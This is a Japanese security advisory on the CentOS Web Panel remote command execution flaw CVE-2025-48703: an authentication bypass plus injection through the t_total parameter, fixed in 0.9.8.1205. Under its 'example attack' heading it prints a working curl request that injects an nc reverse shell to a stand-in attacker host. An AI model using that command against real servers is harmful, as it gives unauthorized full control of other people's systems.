海外のセキュリティ企業fenriskの調査によると2025年6月22日 、CentOS Web Panel(CWP)において、未認証で任意のコマンドをリモート実行可能な脆弱性(CVE-2025-48703)が発見されました。本脆弱性は、CWPのバージョン0.9.8.1188および0.9.8.1204を含む複数のバージョンに影響し、サーバーが完全に乗っ取られる可能性があります。
2025年5月時点ではshodan.ioで20万件を超えるCWPインスタンスが参照されているため危険性が高いです。
脆弱性の概要
CWPはCentOSやAlmaLinux、Rocky LinuxといったRPM系ディストリビューション向けのホスティング管理パネルで、Web、メール、DNSなどのサーバー管理をGUIで行える無料ツールです。本脆弱性は以下2点の問題を組み合わせたものです。
- 認証バイパス:CWPのユーザーインターフェースにおいて、ユーザー認証なしにファイル操作機能にアクセスできてしまう問題。
- コマンドインジェクション:ファイルパーミッション設定用の
t_totalパラメータにおいて、サニタイズが不十分で任意のシェルコマンドが実行可能。

画像:fenrisk
攻撃者はこれらの脆弱性を利用して、CWPが稼働するサーバーに対し未認証でコマンド実行を行うことができます。
脆弱性の対応状況
本脆弱性は2025年5月13日にCWP開発チームへ報告され、6月にリリースされたバージョン0.9.8.1205にて修正されています。
CWPを使用している管理者は、直ちに最新バージョンへのアップデートを実施する必要があります。
攻撃の具体例
攻撃者は有効な非rootユーザー名を知っていれば、HTTPリクエストのt_totalパラメータに悪意あるコマンドを挿入することで、バックドアの設置やリバースシェルの取得が可能です。例えば、以下のようなcurlコマンドで攻撃を実行できます:
curl -kis 'https://<target>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=$(nc attacker_ip 9999 -e /bin/bash)'
このリクエストにより、対象サーバーから攻撃者のホストへシェル接続が確立され、完全な操作が可能になります。
参照







